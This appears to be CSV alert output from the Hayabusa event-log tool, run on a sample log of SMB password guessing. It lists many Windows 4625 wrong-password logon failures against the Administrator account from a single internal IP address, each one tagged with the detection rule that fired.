2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OeVo7D3oBsdUMHfj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mLqSB2yGMksaBgUS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y7qRzzpL2YhfIGSD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VvE5tMw3MjDhA0Fe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aXuNgOkIzvKIuJki  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q8vPHEXrxVpUyKZq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Vk7sh6VM7AZQv2in  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jurt5hAg90y1VWdT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MlrPbTbJRTxFakiv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RQ5cWmYL8weCCRT0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k0v2Emgn7BD1STZl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MJppWxAiNJ4D0s2U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zHVcJEec3y6v9gIo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 68RKE5dS8X5Px2gR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Np8mTqhr7QasXk1e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MhpDNDIPVyRlfej8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qZtmxGeLj25VSUcm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SPN8w8WghBYzChZc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 36hmbCuKxF9Dt4vR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TALpRirdvB9a8y6M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wvEvwFeXGOgycZvA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ppxeOgZNua2Ieuc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n4U5XdQu1YtSat7J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MN0OfYE6vPgqyyZN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmfCPIdiTH9gG2qZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UtcHAxmfDL9C9uZa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5TX62kMSJqq0Lv8o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hA20OdabfW5DMphV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ex5Awm2zaVhvAMTH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I72BOMPQHyyP374g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4al5pUa4mKfbL734  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UNHH8ESWZ4Rx6K93  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ay3XdxRFXXaD4Ib  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1PgyG7spUL5glkVh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6D6PVnrIODwtcIXN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cRZgqmQbL3l7KTke  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HYGKv2l0s9XZnqkl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wX2R08dxiEcRNzcM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HcN791fdSHwaWuBC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CRObbkQsykQma2Tn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v4UvU7VglbA2p0Z9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8ODkwHD0dwGaWhVH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5bPQ5GsX1UUXA6ws  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bvRQ0dVaLawXoo2O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BjxwDdOYBDDSJGun  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: czlTDa1F6edSUBdy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mrtgv5HAqRuelEvF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gfny9Y4SGRZTUXi7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hdhoRgnyj4JPpN2j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K4Qclkpq5ZMKmdCB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0GdZSrcqmfGBfAVy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XA7eJrFopzOb3YQS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2XoSwawv7Ji26GQT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 637CaCAc9u7z99X7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Y6Pww45qxQjrZ0C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5CPU20SF5i6Cdq34  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HAdaPDVTws6TObvK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KUCoisntgbX7Mnis  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MFN0b769jRyDxyAW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HKr2OCyezvSEsHBZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QN3snXM4mwhauvvF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J1VpvQgnwXVxRY1u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p5bsnUZjpHrbD6kN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hpL2QnQ0kKqU40a6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rpkpNfeTsOeXEsJ0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5mBhuTFm02IjipEw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yZ908ZOCkSBC7tms  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8l7Bct5nMTZHd5mK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lRk6e7SrInMDsdMV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MhGByctTcM7NXGtB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BgzhW3Pd5JAB8j4f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GZOm1J5kdItrQpGL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
